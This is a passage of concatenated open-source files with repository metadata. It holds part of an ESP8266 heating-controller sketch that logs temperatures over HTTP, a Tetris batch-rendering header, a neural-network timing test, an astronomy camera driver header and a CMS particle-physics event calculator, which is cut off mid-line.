prise de décision chauffage*/ /* Sauvegarde des logs */ //url = String("/temperature/insert.php?temp_ext=") + temperature +"&temp=" + temp_int + "&humi=" + humidity_int + "&Consigne=" + consigne + "&Radiateur=" + radiateur + "&Allume=" + allume; url = String("/temperature/temp_rest.php?rquest=insert_temp"); data = "temp_ext=" + (String)temperature +"&temp=" + (String)temp_int + "&humi=" + (String)humidity_int + "&Consigne=" + (String)consigne + "&Radiateur=" + (String)radiateur + "&Allume=" + (String)allume; if (debug){ Serial.print("Connexion au serveur : "); Serial.println(serverPerso); Serial.println(url); } client.connect(serverPerso, httpPort); if (debug) { Serial.print("demande URL: "); Serial.println(url); } //client.print(String("POST ") + url + " HTTP/1.1\r\n" + // "Host: " + serverPerso + "\r\n" + // "Connection: close\r\n\r\n"); client.println(String("POST ") + url + " HTTP/1.1"); client.println("Host: " + (String)serverPerso); client.println("Content-Type: application/x-www-form-urlencoded"); client.println("Connection: close"); client.println("User-Agent: Arduino/1.0"); client.print("Content-Length: "); client.println(data.length()); client.println(); client.print(data); client.println(); /* Fin sauvegarde des logs */ /* Pause avant la prochaine mesure et reboot régulier */ delay(timeoutMesure*60000); temps = temps + timeoutMesure; if (temps >= (timeoutReset*(60/timeoutMesure))) { ESP.restart(); // Redémarrage régulier } } else if (modeChauf==1) { } else if (modeChauf==9) { if (debug) { Serial.print("Connexion au WiFi "); Serial.println(ssid); } WiFi.mode(WIFI_STA); WiFi.begin(ssid, password); // On se connecte WiFi.waitForConnectResult(); Serial.println(WiFi.status()); delay(1000); temps = 0; blink=HIGH; while (WiFi.status() != WL_CONNECTED && tempsSauve < timeoutWiFi) { // On attend delay(500); tempsSauve=tempsSauve+500; digitalWrite(led, blink); if (blink==HIGH){ blink = LOW; } else { blink = HIGH; } if (debug) { Serial.print("."); } } // Si on dépasse le temps de connexion au WIFI if (tempsSauve >= timeoutWiFi) { /* Mesure de la température de la pièce */ mesureTemp(); /* Prise de décision chauffage en mode secours*/ if (temp_int<consigneSauve) { allume = 1; digitalWrite(chauffage, HIGH); delay(timeoutMesure*60000); } else { allume = 0; digitalWrite(chauffage, LOW); } /* Fin prise de décision chauffage en mode secours*/ ESP.restart(); } // Si on arrive jusqu'ici c'est que le WIFI est connecté // Passage en mode confort modeChauf=0; if (debug) { Serial.println(""); // on affiche les paramètres Serial.println("WiFi connecté"); Serial.print("Adresse IP du module ESP: "); Serial.println(WiFi.localIP()); Serial.print("Adresse IP de la box : "); Serial.println(WiFi.gatewayIP()); } } } /* Lecture de la température et de l'humidité, avec gestion des erreurs */ byte mesureTemp (){ humidity_int = dht.readHumidity(); // Lecture de la température en Celcius temp_int = dht.readTemperature(); // Ajouter une gestion des erreurs if (temp_int == 0) { temp_int = 2; } if (debug) { Serial.print("Temperature : "); Serial.print(temp_int); Serial.print(" | Humidite : "); Serial.println(humidity_int); } return DHT_SUCCESS; } byte lectureValeurs(WiFiClient cli, String keyword, String keyword2) { boolean inBody = false; // on est dans l'en-tête // On lit les données reçues, s'il y en a while (cli.available()) { String line = cli.readStringUntil('\r'); if (line.length() == 1) inBody = true; /* passer l'en-tête jusqu'à une ligne vide */ if (inBody) { // ligne du corps du message, on cherche le mot clé int pos = line.indexOf(keyword); if (pos > 0) { /* mot clé trouvé */ // indexOf donne la position du début du mot clé, en ajoutant sa longueur // on se place à la fin. pos += keyword.length(); temperature = atof(&line[pos]) - 273.15; if (debug) { Serial.println(temperature); } } pos = line.indexOf(keyword2); if (pos > 0) { /* mot clé trouvé */ // indexOf donne la position du début du mot clé, en ajoutant sa longueur // on se place à la fin. pos += keyword2.length(); humidity = atoi(&line[pos]); if (debug) { Serial.println(humidity); } } } } } byte lectureConsigne(WiFiClient cli, String keyword) { boolean inBody = false; // on est dans l'en-tête // On lit les données reçues, s'il y en a while (cli.available()) { String line = cli.readStringUntil('\r'); if (line.length() == 1) inBody = true; /* passer l'en-tête jusqu'à une ligne vide */ if (inBody) { // ligne du corps du message, on cherche le mot clé int pos = line.indexOf(keyword); if (pos > 0) { /* mot clé trouvé */ // indexOf donne la position du début du mot clé, en ajoutant sa longueur // on se place à la fin. pos += keyword.length(); consigne = atof(&line[pos]); if (debug) { Serial.println(consigne); } } } } }
35a40e20a17405b04bb70c9374c4972786c24510
c5c1afb02f83f630446f1a2c6a463e6f22bea906
/tetris/framework/Batch.h
b63e53669ea47613d2902ba8155d3c3192928cf1
[]
no_license
GrimMaple/tetris
10732bd73ad8543ef066ae15e5a7468d5c983afe
65b27b39da3a633762f9d5429ee5c76d5ed22abb
refs/heads/master
2021-09-05T22:46:39.601419
2018-01-31T13:19:29
2018-01-31T13:19:29
119,689,748
0
0
null
null
null
null
UTF-8
C++
false
false
651
h
Batch.h
#ifndef _BATCH_H_ #define _BATCH_H_ namespace Framework { /* A basic batch. This class handles vertex arrays right: adding points and rendering stuff. Meant to be subclassed */ class Batch { private: float *vertex; float *color; // Even if those thecnically do the same, I still leave both because the code // is more clear and understandable this way. And yes, that only costs 4 extra bytes int position; int elements; protected: unsigned int mode; Batch(size_t max_points); void AddPoint(float x, float y, float r, float g, float b, float a); public: void Begin(); void End(); virtual ~Batch(); }; } #endif
e32afeb58441d222611c5aca350f5a80df8647cf
6e35c07155d1e9bb7c9fd86636754a6df6bb23e8
/test.cpp
8b25a8585655ea859f6eb86886b5e90603a50157
[]
no_license
szemenyeim/RoboDNN
3a33836878f45085d3fbb234d2d593b25ac1afb9
3e6584b63d619b5ea819150ebdcefc837ac0f250
refs/heads/master
2022-01-24T00:01:07.012297
2019-06-06T13:59:33
2019-06-06T13:59:33
114,206,302
5
1
null
null
null
null
UTF-8
C++
false
false
2,054
cpp
test.cpp
#include <iostream> #include <fstream> #include <cmath> #include "Utils.h" #include "RoboDNN.h" #include <ctime> int main() { // Create random image int imgCnt = 100; int W = 512, H = 384; std::vector<float> in(W*H*3); int rowoffs = 0; int choffs = W*H; for (int i = 0; i < H; i++) { for (int j = 0; j < W; j++) { in[rowoffs + j] = rand()%255; in[choffs + rowoffs + j] = rand()%255; in[2*choffs + rowoffs + j] = rand()%255; } rowoffs += W; } float runs[4]; for (int j = 0; j < 4; j++) { std::cout << "Running net " << j << std::endl; std::string cfg = "robo.cfg"; if(j==3) cfg = "robo-hr.cfg"; std::string weight = ""; switch (j) { case 0: weight = "weightsFT.dat"; break; case 1: weight = "weights88.dat"; break; case 2: weight = "weights93.dat"; break; case 3: weight = "weights93.dat"; break; default: break; } // Construct net Network net("config/", cfg, weight); double elapsed = 0; for (int i = 0; i < imgCnt; i++) { clock_t start = clock(); float *data_f = net.forward(in.data()); std::vector<float> out(data_f, data_f + net.getOutCnt()); clock_t finish = clock(); //std::cout << "Time: " << (finish - start).count() / 1000000.0 << " ms\n\n"; elapsed += double(finish - start) / CLOCKS_PER_SEC * 1000.0; } runs[j] = elapsed/(imgCnt); } std::cout << "Results" << std::endl; std::cout << runs[0] << std::endl; std::cout << runs[1] << std::endl; std::cout << runs[2] << std::endl; std::cout << runs[3] << std::endl; return 0; }
b432912c483b6ff4ab47c348e399606bf66d441a
632f4b73cc26bbf663b43e80cce3199e5e6d33c6
/chimera_apogee/instruments/external/apogee_cpp_chimera-1.1.0/3rd_party/include/libapogee-2.1/apogee/Alta.h
8de5ce47741d966d75437c3ac61b200109921410
[]
no_license
astroufsc/chimera-apogee
069d75dc95163b7dfc7c835c01cac7b4359e8714
6012a7d3989a7265649b6b3af3552af562471325
refs/heads/master
2021-01-21T07:20:39.061438
2015-07-14T19:07:26
2015-07-14T19:07:26
35,913,771
0
0
null
null
null
null
UTF-8
C++
false
false
4,376
h
Alta.h
/*! * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this file, * You can obtain one at http://mozilla.org/MPL/2.0/. * * Copyright(c) 2009 Apogee Instruments, Inc. * * \class Alta * \brief Derived class for the alta apogee cameras * */ #ifndef ALTA_INCLUDE_H__ #define ALTA_INCLUDE_H__ #include <string> #include "ApogeeCam.h" class DLL_EXPORT Alta : public ApogeeCam { public: Alta(); virtual ~Alta(); void OpenConnection( const std::string & ioType, const std::string & DeviceAddr, const uint16_t FirmwareRev, const uint16_t Id ); void StartExposure( double Duration, bool IsLight ); CameraStatusRegs GetStatus(); Apg::Status GetImagingStatus(); void GetImage( std::vector<uint16_t> & out ); void StopExposure( bool Digitize ); uint32_t GetAvailableMemory(); /*! * Sets the analog to digital converter gain value for the 12 bit ADC. * \param [in] gain The new gain value. 0-1023 is a valid range. * Calling ApogeeCam::SetAdcGain( gain, 1, 0 ) is equivalent to this function * and is recommended for use. * \exception std::runtime_error */ void SetCcdAdc12BitGain( uint16_t gain ); /*! * Sets the analog to digital converter offset vaule for the 12 bit ADC. * \param [in] gain The new offset value. 0-255 is a valid range. * Calling ApogeeCam::SetAdcOffset( offset, 1, 0 ) is equivalent to this function * and is recommended for use. * \exception std::runtime_error */ void SetCcdAdc12BitOffset( uint16_t offset ); /*! * Returns the analog to digital converter gain value for the 12 bit ADC. * Calling ApogeeCam::GetAdcGain( 1, 0 ) is equivalent to this function * and is recommended for use. * \exception std::runtime_error */ uint16_t GetCcdAdc12BitGain(); /*! * Returns the analog to digital converter offset value for the 12 bit ADC. * Calling ApogeeCam::GetAdcOffset( 1, 0 ) is equivalent to this function * and is recommended for use. * \exception std::runtime_error */ uint16_t GetCcdAdc12BitOffset(); /*! * Returns the analog to digital converter gain value for the 16 bit ADC. * Calling ApogeeCam::GetAdcOffset( 0, 0 ) is equivalent to this function * and is recommended for use. * \exception std::runtime_error */ double GetCcdAdc16BitGain(); int32_t GetNumAds(); int32_t GetNumAdChannels(); double GetCoolerDrive(); /*! * * \exception std::runtime_error */ void SetFanMode( Apg::FanMode mode, bool PreCondCheck = true ); /*! * * \exception std::runtime_error */ Apg::FanMode GetFanMode(); double GetTempHeatsink(); /*! * Returns an ethernet's camera MAC address. Will throw * an std::runtime_error exception if the call is made on a * USB camera. * \exception std::runtime_error */ std::string GetMacAddress(); protected: Alta(const std::string & ioType, const std::string & DeviceAddr); void ExposureAndGetImgRC(uint16_t & r, uint16_t & c); uint16_t ExposureZ(); uint16_t GetImageZ(); uint16_t GetIlluminationMask(); void CreateCamIo(const std::string & ioType, const std::string & DeviceAddr); void FixImgFromCamera( const std::vector<uint16_t> & data, std::vector<uint16_t> & out, int32_t rows, int32_t cols); private: void VerifyCamId(); void CfgCamFromId( uint16_t CameraId ); uint16_t GetPixelShift(); void Init12BitCcdAdc(); void StopExposureModeTdiKinetics( bool Digitize ); const std::string m_fileName; //disabling the copy ctor and assignment operator //generated by the compiler - don't want them //Effective C++ Item 6 Alta(const Alta&); Alta& operator=(Alta&); }; #endif
60b77a161d6c0b4993327d395a214a6b8e583190
67c9feb754b2e0326f376e7bc1d11a43bd0b8d0f
/Com/src/singleLepCalc.cc
4dddf9b927616494a2d9f9dd5d43a3608cc647e9
[]
no_license
rsyarif/LJMet
1c83b3f4c6d5fe7297279b6d8af15016ca17f52c
a61c9de7486cc163e728c38364d0fe9aa5a0ff52
refs/heads/master
2016-09-10T18:06:32.600309
2014-12-01T16:49:53
2014-12-01T16:49:53
null
0
0
null
null
null
null
UTF-8
C++
false
false
24,596
cc
singleLepCalc.cc
/* Calculator for a generic single lepton analysis Author: Joshua Swanson, 2014 */ #include <iostream> #include "LJMet/Com/interface/BaseCalc.h" #include "LJMet/Com/interface/LjmetFactory.h" #include "LJMet/Com/interface/LjmetEventContent.h" #include "TLorentzVector.h" #include "EgammaAnalysis/ElectronTools/interface/ElectronEffectiveArea.h" #include "DataFormats/HLTReco/interface/TriggerEvent.h" #include "DataFormats/Math/interface/deltaR.h" class LjmetFactory; class singleLepCalc : public BaseCalc{ public: singleLepCalc(); virtual ~singleLepCalc(){} virtual int BeginJob(){ if (mPset.exists("triggerSummary")) triggerSummary_ = mPset.getParameter<edm::InputTag>("triggerSummary"); else triggerSummary_ = edm::InputTag("hltTriggerSummaryAOD"); if (mPset.exists("rhoSrc")) rhoSrc_ = mPset.getParameter<edm::InputTag>("rhoSrc"); else rhoSrc_ = edm::InputTag("kt6PFJets", "rho"); if (mPset.exists("isTB")) isTB_ = mPset.getParameter<bool>("isTB"); else isTB_ = false; if (mPset.exists("isTT")) isTT_ = mPset.getParameter<bool>("isTT"); else isTT_ = false; if (mPset.exists("isWJets")) isWJets_ = mPset.getParameter<bool>("isWJets"); else isWJets_ = false; // Rizki testing to include gen info - begin if (mPset.exists("isMc")) isMc = mPset.getParameter<bool>("isMc"); else isMc = false; if (mPset.exists("isTpJTH")) isTpJTH = mPset.getParameter<bool>("isTpJTH"); else isTpJTH = false; if (mPset.exists("genParticles")) genParticles_it = mPset.getParameter<edm::InputTag>("genParticles"); else genParticles_it = edm::InputTag("prunedGenParticles"); // Rizki testing to include gen info - end return 0; } virtual int AnalyzeEvent(edm::EventBase const & event, BaseEventSelector * selector); virtual int EndJob(){return 0;} private: edm::InputTag triggerSummary_; edm::InputTag rhoSrc_; bool isWJets_; bool isTB_; bool isTT_; //rizki changes - begin bool isMc; bool isTpJTH; edm::InputTag genParticles_it; //rizki changes - end }; static int reg = LjmetFactory::GetInstance()->Register(new singleLepCalc(), "singleLepCalc"); singleLepCalc::singleLepCalc(){ } int singleLepCalc::AnalyzeEvent(edm::EventBase const & event, BaseEventSelector * selector){ // // compute event variables here // // // _____ Get objects from the selector _____________________ // std::vector<edm::Ptr<pat::Jet> > const & vSelJets = selector->GetSelectedJets(); std::vector<edm::Ptr<pat::Jet> > const & vSelBtagJets = selector->GetSelectedBtagJets(); std::vector<edm::Ptr<pat::Jet> > const & vAllJets = selector->GetAllJets(); std::vector<std::pair<TLorentzVector,bool>> const & vCorrBtagJets = selector->GetCorrJetsWithBTags(); std::vector<edm::Ptr<pat::Muon> > const & vSelMuons = selector->GetSelectedMuons(); std::vector<edm::Ptr<pat::Muon> > const & vLooseMuons = selector->GetLooseMuons(); std::vector<edm::Ptr<pat::Electron> > const & vSelElectrons = selector->GetSelectedElectrons(); std::vector<edm::Ptr<pat::Electron> > const & vLooseElectrons = selector->GetLooseElectrons(); edm::Ptr<pat::MET> const & pMet = selector->GetMet(); edm::Ptr<reco::PFMET> const & pType1CorrMet = selector->GetType1CorrMet(); TLorentzVector const & corrMET = selector->GetCorrectedMet(); std::vector<edm::Ptr<reco::Vertex> > const & vSelPVs = selector->GetSelectedPVs(); // //_____Event kinematics _____________________ // int _nAllJets = (int)vAllJets.size(); int _nSelJets = (int)vSelJets.size(); int _nSelBtagJets = (int)vSelBtagJets.size(); int _nCorrBtagJets = (int)vCorrBtagJets.size(); int _nSelMuons = (int)vSelMuons.size(); int _nLooseMuons = (int)vLooseMuons.size(); int _nSelElectrons = (int)vSelElectrons.size(); int _nLooseElectrons = (int)vLooseElectrons.size(); int _nSelPVs = (int)vSelPVs.size(); SetValue("nPV",_nSelPVs); // Muon double _muon_1_pt = -9999.0; double _muon_1_phi = -9999.0; double _muon_1_eta = -9999.0; double _muon_1_RelIso = -9999.0; if (_nSelMuons>0) { _muon_1_pt = vSelMuons[0]->pt(); _muon_1_phi = vSelMuons[0]->phi(); _muon_1_eta = vSelMuons[0]->eta(); double chIso = vSelMuons[0]->userIsolation(pat::PfChargedHadronIso); double nhIso = vSelMuons[0]->userIsolation(pat::PfNeutralHadronIso); double gIso = vSelMuons[0]->userIsolation(pat::PfGammaIso); double puIso = vSelMuons[0]->userIsolation(pat::PfPUChargedHadronIso); _muon_1_RelIso = (chIso + std::max(0.,nhIso + gIso - 0.5*puIso))/_muon_1_pt; } SetValue("muon_1_pt",_muon_1_pt); SetValue("muon_1_phi",_muon_1_phi); SetValue("muon_1_eta",_muon_1_eta); SetValue("muon_1_RelIso",_muon_1_RelIso); // Electron edm::Handle<double> rhoHandle; event.getByLabel(rhoSrc_, rhoHandle); double rhoIso = std::max(*(rhoHandle.product()), 0.0); double _electron_1_pt = -9999.0; double _electron_1_phi = -9999.0; double _electron_1_eta = -9999.0; double _electron_1_RelIso = -9999.0; if (_nSelElectrons>0) { _electron_1_pt = vSelElectrons[0]->ecalDrivenMomentum().pt(); _electron_1_phi = vSelElectrons[0]->phi(); _electron_1_eta = vSelElectrons[0]->eta(); double AEff = ElectronEffectiveArea::GetElectronEffectiveArea(ElectronEffectiveArea::kEleGammaAndNeutralHadronIso03, vSelElectrons[0]->superCluster()->eta(), ElectronEffectiveArea::kEleEAData2012); double chIso = vSelElectrons[0]->chargedHadronIso(); double nhIso = vSelElectrons[0]->neutralHadronIso(); double phIso = vSelElectrons[0]->photonIso(); _electron_1_RelIso = ( chIso + max(0.0, nhIso + phIso - rhoIso*AEff) )/ vSelElectrons[0]->ecalDrivenMomentum().pt(); } SetValue("elec_1_pt", _electron_1_pt); SetValue("elec_1_phi", _electron_1_phi); SetValue("elec_1_eta", _electron_1_eta); SetValue("elec_1_RelIso", _electron_1_RelIso); double _electron_2_pt = -9999.0; double _electron_2_phi = -9999.0; double _electron_2_eta = -9999.0; double _electron_2_RelIso = -9999.0; if (_nSelElectrons>1) { _electron_2_pt = vSelElectrons[1]->ecalDrivenMomentum().pt(); _electron_2_phi = vSelElectrons[1]->phi(); _electron_2_eta = vSelElectrons[1]->eta(); double AEff = ElectronEffectiveArea::GetElectronEffectiveArea(ElectronEffectiveArea::kEleGammaAndNeutralHadronIso03, vSelElectrons[1]->superCluster()->eta(), ElectronEffectiveArea::kEleEAData2012); double chIso = vSelElectrons[1]->chargedHadronIso(); double nhIso = vSelElectrons[1]->neutralHadronIso(); double phIso = vSelElectrons[1]->photonIso(); _electron_2_RelIso = ( chIso + max(0.0, nhIso + phIso - rhoIso*AEff) )/ vSelElectrons[1]->ecalDrivenMomentum().pt(); } SetValue("elec_2_pt", _electron_2_pt); SetValue("elec_2_phi", _electron_2_phi); SetValue("elec_2_eta", _electron_2_eta); SetValue("elec_2_RelIso", _electron_2_RelIso); // Trigger Matching edm::Handle<trigger::TriggerEvent> mhEdmTriggerEvent; event.getByLabel(triggerSummary_,mhEdmTriggerEvent); trigger::TriggerObjectCollection allObjects = mhEdmTriggerEvent->getObjects(); int _electron_1_hltmatched =0; int _electron_2_hltmatched =0; if (_nSelElectrons>0) { for(int i=0; i<mhEdmTriggerEvent->sizeFilters(); i++){ if( mhEdmTriggerEvent->filterTag(i).label()!="hltEle27WP80TrackIsoFilter") continue; trigger::Keys keys = mhEdmTriggerEvent->filterKeys(i); double dR1 = 999.0; double dR2 = 999.0; for(size_t j=0; j<keys.size(); j++){ dR1=deltaR(allObjects[keys[j]].eta(),allObjects[keys[j]].phi(),_electron_1_eta,_electron_1_phi); if (_nSelElectrons>1) dR2=deltaR(allObjects[keys[j]].eta(),allObjects[keys[j]].phi(),_electron_2_eta,_electron_2_phi); if ( (dR1 < 0.5) || (dR2 < 0.5) ) { if (dR1 < 0.5 && dR2 < 0.5 && dR1<dR2 ) _electron_1_hltmatched = 1; else if (dR1 < 0.5 && dR2 < 0.5 && dR2<dR1 ) _electron_2_hltmatched = 1; else if (dR1 < 0.5 && dR2 >= 0.5 ) _electron_1_hltmatched =1; else if (dR2 < 0.5 && dR1 >= 0.5 ) _electron_2_hltmatched =1; } } } } SetValue("electron_1_hltmatched",_electron_1_hltmatched); SetValue("electron_2_hltmatched",_electron_2_hltmatched); double _el1el2_mass = -999.0; if (_nSelElectrons>1) { math::XYZTLorentzVector lv_el1 = vSelElectrons[0]->p4(); math::XYZTLorentzVector lv_el2 = vSelElectrons[1]->p4(); math::XYZTLorentzVector lv_el1el2 = lv_el1+lv_el2; _el1el2_mass = lv_el1el2.M(); } SetValue("el1el2_mass",_el1el2_mass); // MET double _met = -9999.0; double _met_phi = -9999.0; math::XYZTLorentzVector lv_met; if(pMet.isNonnull() && pMet.isAvailable()) { lv_met = pMet->p4(); _met = lv_met.pt(); _met_phi = lv_met.phi(); } SetValue("met", _met); SetValue("met_phi", _met_phi); double _type1corrmet = -9999.0; double _type1corrmet_phi = -9999.0; math::XYZTLorentzVector lv_type1corrmet; if(pType1CorrMet.isNonnull() && pType1CorrMet.isAvailable()) { lv_type1corrmet = pType1CorrMet->p4(); _type1corrmet = lv_type1corrmet.pt(); _type1corrmet_phi = lv_type1corrmet.phi(); } SetValue("type1corrmet", _type1corrmet); SetValue("type1corrmet_phi", _type1corrmet_phi); // Corrected MET Double_t _corr_met = -9999.0; Double_t _corr_met_phi = -9999.0; if(corrMET.Pt()>0) { _corr_met = corrMET.Pt(); _corr_met_phi = corrMET.Phi(); } SetValue("corr_met", _corr_met); SetValue("corr_met_phi", _corr_met_phi); // Store Jet Vectors for the selected jets and the bjets vector<Double_t> jet_pt; vector<Double_t> jet_eta; vector<Double_t> jet_phi; vector<int> jet_tag; vector<Double_t> bjet_pt; vector<Double_t> bjet_eta; vector<Double_t> bjet_phi; int nbtags = 0; for(int i=0; i<_nCorrBtagJets; i++){ jet_pt.push_back(vCorrBtagJets[i].first.Pt()); jet_eta.push_back(vCorrBtagJets[i].first.Eta()); jet_phi.push_back(vCorrBtagJets[i].first.Phi()); jet_tag.push_back(int(vCorrBtagJets[i].second)); if( vCorrBtagJets[i].second ){ nbtags++; bjet_pt.push_back(vCorrBtagJets[i].first.Pt()); bjet_eta.push_back(vCorrBtagJets[i].first.Eta()); bjet_phi.push_back(vCorrBtagJets[i].first.Phi()); } } SetValue("jet_pt", jet_pt); SetValue("jet_eta", jet_eta); SetValue("jet_phi", jet_phi); SetValue("jet_tag", jet_tag); SetValue("bjet_pt", bjet_pt); SetValue("bjet_eta", bjet_eta); SetValue("bjet_phi", bjet_phi); SetValue("n_btags", nbtags); vector<int> jet_flavor; int nBjets = 0; int nCjets = 0; for(int i=0; i<_nSelJets; i++){ jet_flavor.push_back( abs(vSelJets[i]->partonFlavour()) ); if( abs(vSelJets[i]->partonFlavour())==5 ) nBjets++; if( abs(vSelJets[i]->partonFlavour())==4 ) nCjets++; } SetValue("n_Bjets", nBjets); SetValue("n_Cjets", nCjets); SetValue("jet_flavor", jet_flavor); //Event weights double _weight_WJets = 1.0; if (isWJets_) { if ( nBjets > 0) _weight_WJets = 1.21*0.92; if ( nBjets == 0 and nCjets > 0) _weight_WJets = 1.66*0.92; if ( nBjets == 0 and nCjets == 0) _weight_WJets = 1.0*0.85; } else { _weight_WJets = 1.0; } SetValue("weight_WJets", _weight_WJets); double _weight_muon_eff = 1.0; //A+B+C Tight ID*ISO(dBeta<0.12)*TRIG(IsoMu24_eta2p1) //A+B = 5.32 C = 0.495 if (_nSelMuons>0) { if (abs(_muon_1_eta) <= 0.9 ) _weight_muon_eff = 0.9925*1.0000*0.9815; if ( 0.9 < abs(_muon_1_eta) && abs(_muon_1_eta) <= 1.2 ) _weight_muon_eff = 0.9928*1.0006*0.9651; if ( 1.2 < abs(_muon_1_eta) && abs(_muon_1_eta) <= 2.1 ) _weight_muon_eff = 0.9960*1.0006*0.9968; } SetValue("weight_MuonEff", _weight_muon_eff); double _weight_electron_eff = 1.0; // Cut based Tight ID scale factors if (_nSelElectrons>0) { if ( abs(_electron_1_eta) <= 0.8 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff = 0.978; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff = 0.981; else if (_electron_1_pt > 50.0 ) _weight_electron_eff = 0.982; } else if (0.8 < abs(_electron_1_eta) && abs(_electron_1_eta) <= 1.442 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff = 0.958; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff = 0.969; else if (_electron_1_pt > 50.0 ) _weight_electron_eff = 0.969; } else if ( 1.442 < abs(_electron_1_eta) && abs(_electron_1_eta) <= 1.556 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff = 0.907; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff = 0.904; else if (_electron_1_pt > 50.0 ) _weight_electron_eff = 0.926; } else if ( 1.556 < abs(_electron_1_eta) && abs(_electron_1_eta) <= 2.0 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff = 0.909; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff = 0.942; else if (_electron_1_pt > 50.0 ) _weight_electron_eff = 0.957; } else if ( 2.0 < abs(_electron_1_eta) && abs(_electron_1_eta) < 2.5 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff = 0.987; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff = 0.991; else if (_electron_1_pt > 50.0 ) _weight_electron_eff = 0.999; } } SetValue("weight_ElectronEff", _weight_electron_eff); double _weight_electron_eff_53x = 1.0; // Cut based Tight ID scale factors for 53x if (_nSelElectrons>0) { if ( abs(_electron_1_eta) <= 0.8 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff_53x = 0.988; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff_53x = 0.989; else if (_electron_1_pt > 50.0 ) _weight_electron_eff_53x = 0.988; } else if (0.8 < abs(_electron_1_eta) && abs(_electron_1_eta) <= 1.442 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff_53x = 0.971; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff_53x = 0.977; else if (_electron_1_pt > 50.0 ) _weight_electron_eff_53x = 0.981; } else if ( 1.442 < abs(_electron_1_eta) && abs(_electron_1_eta) <= 1.556 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff_53x = 0.995; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff_53x = 0.963; else if (_electron_1_pt > 50.0 ) _weight_electron_eff_53x = 0.974; } else if ( 1.556 < abs(_electron_1_eta) && abs(_electron_1_eta) <= 2.0 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff_53x = 0.977; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff_53x = 0.994; else if (_electron_1_pt > 50.0 ) _weight_electron_eff_53x = 0.991; } else if ( 2.0 < abs(_electron_1_eta) && abs(_electron_1_eta) < 2.5 ) { if (_electron_1_pt > 30.0 && _electron_1_pt <= 40.0 ) _weight_electron_eff_53x = 1.027; else if (_electron_1_pt > 40.0 && _electron_1_pt <= 50.0 ) _weight_electron_eff_53x = 1.025; else if (_electron_1_pt > 50.0 ) _weight_electron_eff_53x = 1.015; } } SetValue("weight_ElectronEff_53x", _weight_electron_eff_53x); //Rizki testing to include gen info - begin //_____ Gen Info ______________________________ // std::vector <math::XYZTLorentzVector> lv_genParticles; std::vector <double> genPt; std::vector <double> genEta; std::vector <double> genPhi; std::vector <double> genEnergy; std::vector <double> genMass; //identity std::vector <int> genID; std::vector <int> genIndex; std::vector <int> genStatus; std::vector <int> genMotherID; std::vector <int> genMotherIndex; if (isMc){ edm::Handle<reco::GenParticleCollection> genParticles; event.getByLabel(genParticles_it, genParticles); //std::cout << " " << std::endl; //std::cout << "-----------genPARTICLES-------------" << std::endl; //std::cout << "genParticle size = "<< genParticles->size() << std::endl; for(size_t i = 0; i < genParticles->size(); i++){ const reco::GenParticle & p = (*genParticles).at(i); int id = p.pdgId(); lv_genParticles . push_back(p.p4()); genPt . push_back(lv_genParticles[i].Pt()); genEta . push_back(lv_genParticles[i].Eta()); genPhi . push_back(lv_genParticles[i].Phi()); genEnergy . push_back(lv_genParticles[i].E()); genMass . push_back(lv_genParticles[i].M()); genID . push_back(p.pdgId()); genIndex . push_back((int) i); genStatus . push_back(p.status()); reco::Candidate* mother = (reco::Candidate*) p.mother(); if(mother){ //Find index of mother int mInd = 0; for(size_t j = 0; j < genParticles->size(); j++){ const reco::GenParticle & q = (*genParticles).at(j); if (q.status() != 3) continue; if (mother->pdgId() == q.pdgId() and fabs(mother->eta() - q.eta()) < 0.01 and fabs(mother->pt() - q.pt()) < 0.01){ mInd = (int) j; break; } } genMotherID . push_back(mother->pdgId()); genMotherIndex . push_back(mInd); } else{ genMotherID . push_back(0); genMotherIndex . push_back(0); } //std::cout << i << "." << " pdgId = " << id << ", status = " << p.status() << ", Mother = " << p.mother() << ", Mother Id = " << genMotherID[i] << ", Mother Index = " << genMotherIndex[i]<< std::endl; }//End loop over gen particles } //End MC-only if //Four vector SetValue("genPt" , genPt); SetValue("genEta" , genEta); SetValue("genPhi" , genPhi); SetValue("genEnergy" , genEnergy); SetValue("genMass" , genMass); //Identity SetValue("genID" , genID); SetValue("genIndex" , genIndex); SetValue("genStatus" , genStatus); SetValue("genMotherID" , genMotherID); SetValue("genMotherIndex" , genMotherIndex); //_____ Gen Info for TpJTH ______________________________ // //Four vector math::XYZTLorentzVector lv_genTprime; math::XYZTLorentzVector lv_genTop; math::XYZTLorentzVector lv_genHiggs; math::XYZTLorentzVector lv_genW; if (isTpJTH){ edm::Handle<reco::GenParticleCollection> genParticles; event.getByLabel(genParticles_it, genParticles); for(size_t i = 0; i < genParticles->size(); i++){ const reco::GenParticle & p = (*genParticles).at(i); int id = p.pdgId(); if(id==6000006 || id == 6 || id == 25 || id == 24){ if(id == 6000006 && p.status() == 3) lv_genTprime = p.p4(); if(id == 6 && p.status() == 3) lv_genTop = p.p4(); if(id == 25 && p.status() == 3) lv_genHiggs = p.p4(); if(id == 24 && p.status() == 3) lv_genW = p.p4(); } }//End loop over gen particles } //End MC-only if //Tprime SetValue("genTprimePt" , lv_genTprime.Pt()); SetValue("genTprimeEta" , 